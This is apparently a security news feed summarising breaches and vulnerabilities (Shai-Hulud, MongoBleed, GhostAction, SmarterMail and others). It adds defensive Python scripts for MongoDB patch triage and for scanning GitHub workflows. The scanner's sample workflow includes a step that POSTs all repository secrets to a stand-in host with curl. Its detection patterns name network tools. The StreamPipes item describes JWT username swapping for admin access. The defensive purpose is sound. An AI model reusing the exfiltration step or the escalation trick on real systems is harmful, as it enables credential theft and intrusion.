Ticker feed
Trust Wallet lost $8.5 million to attackers who built on the Shai-Hulud supply chain attack that hit NPM in November. Using developer credentials leaked in that compromise, they published a malicious version of Trust Wallet's Chrome extension on December 24.
The malicious extension targeted 2,520 wallet addresses, draining funds from users who logged in between December 24 and 26. Trust Wallet will reimburse all affected customers and urges users to update to version 2.69 immediately.
Shai-Hulud is a self-replicating worm that infected over 640 NPM packages and created 25,000 repositories leaking stolen data. Despite cleanup efforts, over 12,000 machines remain compromised, and the exposed credentials are still circulating; any token that passed through an infected build should be treated as stolen and rotated.
Source: Security Week
A serious vulnerability in Apache StreamPipes lets ordinary users become administrators by tampering with JWT tokens. The flaw (CVE-2025-47411) affects versions 0.69.0 through 0.97.0 and stems from a broken user-ID creation scheme.
An attacker only has to replace their own username in the token with that of an existing admin account to gain full control. Once inside, they can read sensitive data, change system settings, and potentially compromise the entire data-streaming infrastructure.
The attack needs no special skills or tooling, which makes it especially dangerous for companies handling sensitive business data. Apache released version 0.98.0 to fix the issue and urges an immediate upgrade.
Source: CyberSecurity News
SmarterTools has issued an urgent fix for a critical SmarterMail vulnerability carrying the maximum CVSS score of 10.0. The flaw, CVE-2025-52691, lets unauthenticated attackers upload files to arbitrary locations on the mail server and execute code remotely, with no credentials required.
The vulnerability affects SmarterMail Build 9406 and earlier, leaving organizations at immediate risk of complete system compromise. Attackers could read sensitive email, deploy malware, steal data, and move laterally through the corporate network.
Chua Meng Han of Singapore's CSIT discovered the flaw. SmarterTools has released Build 9413 as the fix; organizations should update immediately.
Source: Cyber Security News
When cybercriminals strike, companies have just minutes to respond before hackers can "detonate" malware across entire systems. London-based S-RM leads the UK's largest cyber-incident response team, getting back to clients within six minutes on average during that critical "reconnaissance" period when attackers are still figuring out what to steal.
The firm faces ethical dilemmas as part of its "extortion support" work - negotiating ransoms with criminal groups. Director Ted Cowell says they challenge clients with "Why should we pay these criminals?" and push for no-payment decisions whenever possible. However, established ransomware groups often honor settlements, making payment sometimes rational for desperate businesses.
As corporate attitudes shift against funding organized crime, recovery services are growing while the UK's National Cyber Security Centre has become more proactive in warning potential victims.
Source: The Guardian
Popular text editor EmEditor was compromised between December 19 and 22: attackers replaced the legitimate download link on the homepage with one serving malware. Users who clicked "Download Now" during this window may have received a fake installer that looked identical to the real one but lacked a valid digital signature, which is the quickest way to tell the two apart.
The malware collected system information, files from the Desktop and Documents folders, VPN configurations, browser credentials, and login data for apps such as Discord, Slack, Teams, and Steam. It also deployed a persistent browser extension called "Google Drive Caching" that swaps cryptocurrency addresses and steals Facebook ad accounts.
Chinese security firm Qianxin discovered that the attack primarily targets users outside former Soviet countries and Iran. EmEditor's developers have posted warnings and indicators of compromise on their website.
Source: Security Week
Pro-Russia hacktivist groups are exploiting weak passwords and exposed connections to breach US critical infrastructure systems in water treatment, food production, and energy sectors. CISA, FBI, and NSA report that groups like Cyber Army of Russia Reborn and NoName057(16) use basic hacking tools to access internet-facing control systems.
While less sophisticated than state-sponsored attacks, these intrusions have caused physical impacts including temporary system shutdowns and costly manual recoveries. The hackers alter system parameters, disable alarms, and restart devices primarily for online publicity rather than strategic advantage.
Federal agencies urge operators to reduce internet exposure, implement multi-factor authentication, and maintain manual operation contingency plans.
Source: Infosecurity Magazine
A critical flaw dubbed "MongoBleed" threatens over 87,000 MongoDB instances reachable from the internet. The vulnerability (CVE-2025-14847) lets unauthenticated attackers read sensitive data straight out of the database process's memory, including passwords, session tokens, and customer records.
The bug lies in MongoDB's zlib network-message compression, which is enabled by default. Specially crafted packets cause the server to "bleed" memory contents back to the sender, no login required. A proof-of-concept exploit is already public on GitHub, sharply raising the risk of exploitation.
Affected versions run from the legacy 3.6 line to the current 8.2 releases. MongoDB has released patches; administrators should upgrade immediately to 8.2.3, 8.0.17, 7.0.28, or newer. As a stopgap, zlib can be removed from the server's compressor list (clients then negotiate another compressor or fall back to uncompressed traffic), and an instance that is reachable from the internet should be moved behind a firewall or VPN regardless of patch level.
Source: Cybersecurity News
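As an added example (not code from the article or from MongoDB), a small Python triage script that classifies a fleet of reported server versions against the fixed releases named above and checks whether a mongod.conf still leaves zlib negotiable. The host names, inventory and config fragment are constructed for the demonstration, and release branches the summary does not mention are reported as "unlisted" rather than guessed at.

```python
import re
from typing import Optional

# Minimum patched release per branch, taken from the advisory summary above.
# Branches it does not list (the 6.0 line, or the 3.6-5.0 range it calls
# affected) are reported as "unlisted" rather than guessed at.
FIXED_RELEASES = {
    (8, 2): 3,    # 8.2.3
    (8, 0): 17,   # 8.0.17
    (7, 0): 28,   # 7.0.28
}

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> tuple[int, int, int]:
    """Parse '8.2.1', 'v7.0.28' or '8.0.16-rc0' into (major, minor, patch)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised MongoDB version string: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def mongobleed_status(version: str) -> str:
    """'patched', 'vulnerable' or 'unlisted' for one server version string."""
    major, minor, patch = parse_version(version)
    fix_patch = FIXED_RELEASES.get((major, minor))
    if fix_patch is None:
        return "unlisted"
    return "patched" if patch >= fix_patch else "vulnerable"


def zlib_still_enabled(mongod_conf: str) -> bool:
    """Stopgap check: does this mongod.conf leave zlib negotiable?

    Looks for the net.compression.compressors key in either its comma-separated,
    flow-list or block-list form. If the key is absent the server default
    applies, which includes zlib. Line-based, so it ignores commented-out keys
    but does not validate the surrounding YAML structure.
    """
    lines = mongod_conf.splitlines()
    for i, line in enumerate(lines):
        key_m = re.match(r"^\s*compressors:\s*(.*?)\s*$", line)
        if not key_m:
            continue
        value = key_m.group(1).strip("[]")
        if value:
            enabled = [c.strip().strip("\"'") for c in value.split(",")]
        else:  # block list on the following lines
            enabled = []
            for nxt in lines[i + 1:]:
                item = re.match(r"^\s*-\s*(\S+)", nxt)
                if not item:
                    break
                enabled.append(item.group(1).strip("\"'"))
        return "zlib" in enabled
    return True


def triage(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Group hosts by status so the 'vulnerable' list can go straight to a ticket."""
    groups: dict[str, list[str]] = {"vulnerable": [], "patched": [], "unlisted": []}
    for host, version in inventory.items():
        groups[mongobleed_status(version)].append(host)
    return groups


# Constructed inventory, as db.version() would report it; not real hosts.
SAMPLE_INVENTORY = {
    "db-prod-01": "8.0.16",
    "db-prod-02": "8.0.17",
    "db-analytics": "7.0.27",
    "db-legacy": "6.0.20",
    "db-new": "v8.2.3",
}

# Constructed mongod.conf fragment with zlib removed from the negotiable set.
SAMPLE_CONF = """\
net:
  port: 27017
  bindIp: 127.0.0.1
  compression:
    compressors: snappy,zstd
"""

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status:>10}: {', '.join(hosts) or '-'}")
    print("zlib still enabled in sample config:", zlib_still_enabled(SAMPLE_CONF))
```

Feed it the output of `db.version()` from each node; an "unlisted" result means the branch is outside the three the advisory summary names and needs a manual check against the vendor's release notes, not that it is safe.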
Freedom Mobile disclosed a data breach on October 23 after hackers gained access to customer accounts through a compromised subcontractor's credentials. The attackers accessed the company's customer management platform and obtained personal information including names, addresses, phone numbers, birth dates, and account numbers for a "limited number" of customers.
The Canadian telecom provider, which serves over 3.5 million subscribers, quickly blocked suspicious accounts and IP addresses. Freedom Mobile confirmed this wasn't a ransomware attack and that their network operations remained unaffected. The company hasn't revealed how many customers were impacted or identified the attackers.
This marks Freedom Mobile's second public data breach, following a 2019 incident involving 15,000 customers.
Source: SecurityWeek
Russia's attempt to shut down its massive illegal data market has completely backfired. For over a decade, the "probiv" market let anyone buy personal information like passport numbers and police records for as little as $10 from corrupt officials. The system helped both investigative journalists expose corruption and police track dissidents.
But as phone scammers and Ukrainian intelligence exploited the leaks, Putin cracked down with 10-year prison sentences and arrests of major operators. Instead of stopping the trade, brokers simply moved overseas where they operate without restrictions. Now they're dumping even more sensitive data, including massive FSB border crossing records and bank customer information affecting millions of Russians.
Source: The Guardian
A large supply chain attack dubbed "GhostAction" has compromised 327 GitHub users across 817 repositories, stealing more than 3,325 secrets including DockerHub credentials, GitHub tokens, and npm tokens. GitGuardian discovered the attack on September 5 while investigating suspicious activity in the FastUUID project's repository.
The attack began with a compromised maintainer account pushing malicious GitHub Actions workflow files built to exfiltrate repository secrets. FastUUID was not the main target: investigators found hundreds of similar malicious commits across other repositories, all tied to the same threat actor.
Several companies had their entire SDK portfolios compromised, with Python, Rust, JavaScript, and Go repositories hit simultaneously. GitGuardian notified affected users immediately; 100 repositories have already reverted the malicious changes, but hundreds remain at risk. Reverting the workflow removes the exfiltration path but not the exposure: any secret a malicious run could read should be treated as stolen and rotated.
Source: Infosecurity Magazine
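An added example, not GitGuardian's tooling and not the actual workflow the attacker pushed: a Python heuristic that splits a workflow file into steps and flags any step that reads secrets and then invokes a network client towards a host outside an assumed allowlist, or that serialises the whole secrets context with `toJSON(secrets)`. The sample workflow, the allowlist and the `example.invalid` destination are constructed for the demonstration.

```python
import re
from typing import Optional

# A step begins at a YAML list item carrying one of the usual step keys.
STEP_START = re.compile(r"^(\s*)-\s+(?:name|uses|run|id|if|with|env|shell):")
# Direct secret reads, plus the catch-all that serialises every secret at once.
SECRET_REF = re.compile(r"secrets\.\w+|toJSON\(\s*secrets\s*\)", re.IGNORECASE)
# Commands that move data off the runner.
EGRESS_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest|ncat)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
STEP_NAME = re.compile(r"^\s*-?\s*(?:name|uses):\s*(.+)$", re.MULTILINE)
# Assumed allowlist of destinations a release workflow legitimately talks to.
ALLOWED_HOSTS = ("github.com", "registry.npmjs.org", "pypi.org", "upload.pypi.org")


def host_allowed(host: str) -> bool:
    """Exact or subdomain match only, so 'evilgithub.com' does not pass."""
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def split_steps(workflow_text: str) -> list[list[str]]:
    """Cut the workflow into per-step line groups using indentation only."""
    steps: list[list[str]] = []
    current: Optional[list[str]] = None
    step_indent = 0
    for line in workflow_text.splitlines():
        m = STEP_START.match(line)
        if m:
            step_indent = len(m.group(1))
            current = [line]
            steps.append(current)
            continue
        if current is None or not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if indent <= step_indent:  # back out to job level: the step is over
            current = None
            continue
        current.append(line)
    return steps


def analyze_step(lines: list[str]) -> Optional[dict]:
    """Return a finding dict for a suspicious step, or None."""
    text = "\n".join(lines)
    name_m = STEP_NAME.search(text)
    name = name_m.group(1).strip() if name_m else lines[0].strip()
    refs = SECRET_REF.findall(text)
    dumps_all = any(r.lower().startswith("tojson") for r in refs)
    egress = EGRESS_CMD.search(text)
    hosts = URL_HOST.findall(text)
    external = [h for h in hosts if not host_allowed(h)]
    reasons = []
    if dumps_all:
        reasons.append("serialises the whole secrets context with toJSON(secrets)")
    # Secrets plus a network client is only fine when every destination is
    # visible in the file and on the allowlist.
    if refs and egress and (external or not hosts):
        where = ", ".join(external) if external else "a destination not visible in the file"
        reasons.append(f"reads secrets and invokes {egress.group(1)} towards {where}")
    if not reasons:
        return None
    return {"step": name, "reasons": reasons, "external_hosts": external}


def scan_workflow(workflow_text: str) -> list[dict]:
    return [f for f in map(analyze_step, split_steps(workflow_text)) if f]


# Constructed sample: two legitimate uses of secrets and one exfiltration step.
SAMPLE_WORKFLOW = """\
name: release
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish
        run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
      - name: Create release
        run: >
          curl -sSf -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}"
          https://api.github.com/repos/example/repo/releases
      - name: Collect telemetry
        run: |
          echo '${{ toJSON(secrets) }}' > /tmp/s.json
          curl -s -X POST --data-binary @/tmp/s.json https://example.invalid/collect
"""

if __name__ == "__main__":
    for finding in scan_workflow(SAMPLE_WORKFLOW):
        print(f"[!] step '{finding['step']}':")
        for reason in finding["reasons"]:
            print(f"      - {reason}")
```

Run it over `.github/workflows/*.yml` across every repository you own, and review pushes that touch those files with the same suspicion as pushes to the build scripts themselves. The scanner is line-based rather than a full YAML parser, so unusual layouts can slip past it; it is a triage aid, not a substitute for restricting which workflows may see which secrets.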